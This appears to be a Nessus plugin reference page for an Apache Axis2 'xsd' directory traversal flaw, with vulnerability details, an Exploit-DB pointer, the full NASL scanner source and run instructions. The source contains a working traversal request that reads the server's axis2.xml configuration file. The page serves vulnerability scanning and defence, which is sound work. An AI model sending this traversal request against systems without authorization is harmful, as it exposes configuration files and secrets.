Apache Axis2 'xsd' Parameter Directory Traversal - Nessus

Medium   Plugin ID: 46741

This page contains detailed information about the Apache Axis2 'xsd' Parameter Directory Traversal Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 46741
Name: Apache Axis2 'xsd' Parameter Directory Traversal
Filename: apache_axis2_directory_traversal.nasl
Vulnerability Published: 2009-03-20
This Plugin Published: 2010-05-27
Last Modification Time: 2022-04-11
Plugin Version: 1.14
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: apache_axis2_detect.nasl
Required KB Items [?]: installed_sw/Axis2

Vulnerability Information

Severity: Medium
Vulnerability Published: 2009-03-20
Patch Published: 2009-06-09
CVE [?]: N/A
CPE [?]: cpe:/a:apache:axis2

Synopsis

A web application on the remote host is affected by a directory traversal vulnerability.

Description

The version of Apache Axis2 installed on the remote host is affected by a directory traversal vulnerability due to improper sanitization of user-supplied input to the 'xsd' parameter in activated services. An attacker can exploit this issue to read arbitrary files on the affected host.

Solution

Upgrade to Apache Axis2 1.5 or later.

Public Exploits

Target Network Port(s): 8080
Target Asset(s): Services/www
Exploit Available: True (Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Apache Axis2 'xsd' Parameter Directory Traversal vulnerability:

  1. Exploit-DB: exploits/php/webapps/12721.txt
    [EDB-12721: Apache Axis2 1.4.1 - Local File Inclusion]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:P/I:N/A:N/E:F/RL:U/RC:ND
CVSS Base Score:5.0 (Medium)
Impact Subscore:2.9
Exploitability Subscore:10.0
CVSS Temporal Score:4.8 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:4.8 (Medium)

Go back to menu.

Plugin Source

This is the apache_axis2_directory_traversal.nasl nessus plugin source code. This script is Copyright (C) 2010-2022 Tenable Network Security, Inc. 

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(46741);
  script_version("1.14");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
  script_bugtraq_id(40343);
  script_xref(name:"EDB-ID", value:"12721");

  script_name(english:"Apache Axis2 'xsd' Parameter Directory Traversal");

  script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host is affected by a directory
traversal vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Axis2 installed on the remote host is affected
by a directory traversal vulnerability due to improper sanitization of
user-supplied input to the 'xsd' parameter in activated services. An
attacker can exploit this issue to read arbitrary files on the
affected host.");
  script_set_attribute(attribute:"see_also", value:"https://issues.apache.org/jira/browse/AXIS2-4279");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Axis2 1.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/03/20");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/06/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/05/27");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:axis2");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.");

  script_dependencies("apache_axis2_detect.nasl");
  script_require_keys("installed_sw/Axis2");
  script_require_ports("Services/www", 8080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "Axis2";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:8080);

install = get_single_install(
  app_name : app,
  port     : port
);

# Directory traversal is exploited through any of the services.
# We can determine active services with /axis2/services/listServices
dir = install['path'];
install_url = build_url(port:port, qs:dir);

dist = get_kb_item(app+'/'+port+dir+'/dist');
if (isnull(dist)) exit(1, "The '"+app+"/"+port+dir+"/dist' KB item is missing.");

services = get_kb_item(app+'/'+port+dir+'/services');
if (isnull(services)) exit(0, "No services were detected for "+app+" on port "+port+".");

services = split(services, sep:',', keep:FALSE);
if (!thorough_tests) services = make_list(services[0]);

# Attempt to retrieve /conf/axis2.xml
foreach service (services)
{
  url = '/services/'+service+'?xsd=..\\conf\\axis2.xml';
  res = http_send_recv3(method:"GET", item:dir+url, port:port, exit_on_fail:TRUE);
  if (
    '~ Licensed to the Apache Software Foundation' >< res[2] &&
    '<axisconfig name="AxisJava2.0">' >< res[2]
  )
  {
    output = strstr(res[2], '<parameter');
    if (empty_or_null(output)) output = res[2];

    security_report_v4(
      port        : port,
      severity    : SECURITY_WARNING,
      file        : '/conf/axis2.xml',
      request     : make_list(install_url + url),
      output      : chomp(output),
      attach_type : 'text/plain'
    );
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/apache_axis2_directory_traversal.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\apache_axis2_directory_traversal.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/apache_axis2_directory_traversal.nasl

Go back to menu.

How to Run

Here is how to run the Apache Axis2 'xsd' Parameter Directory Traversal as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Apache Axis2 'xsd' Parameter Directory Traversal plugin ID 46741.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl apache_axis2_directory_traversal.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a apache_axis2_directory_traversal.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - apache_axis2_directory_traversal.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state apache_axis2_directory_traversal.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 153885 - Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
  • 155600 - Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)
  • 160297 - Apache APISIX Dashboard < 2.10.1 Authentication Bypass (Direct Check)
  • 46740 - Apache Axis2 Default Credentials
  • 156753 - Apache Druid Log4Shell Direct Check (CVE-2021-44228)
  • 90248 - Apache Jetspeed User Manager Service SQLi
  • 156558 - Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228)
  • 156473 - Apache OFBiz Log4Shell Direct Check (CVE-2021-44228)
  • 159323 - Apache Shiro Default Cipher Key (CVE-2016-4437)
  • 131734 - Apache Solr Config API Velocity Template RCE (Direct Check)
  • 126447 - Apache Solr 5.x <= 5.5.5 or 6.x <= 6.6.5 Deserialization Vulnerability (CVE-2019-0192)
  • 132315 - Apache Solr 8.1.1, 8.2.0 Remote JMX RMI Deserialization Vulnerability
  • 156471 - Apache Solr Log4Shell Direct Check (CVE-2021-44228)

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file apache_axis2_directory_traversal.nasl version 1.14. For more plugins, visit the Nessus Plugin Library.

Go back to menu.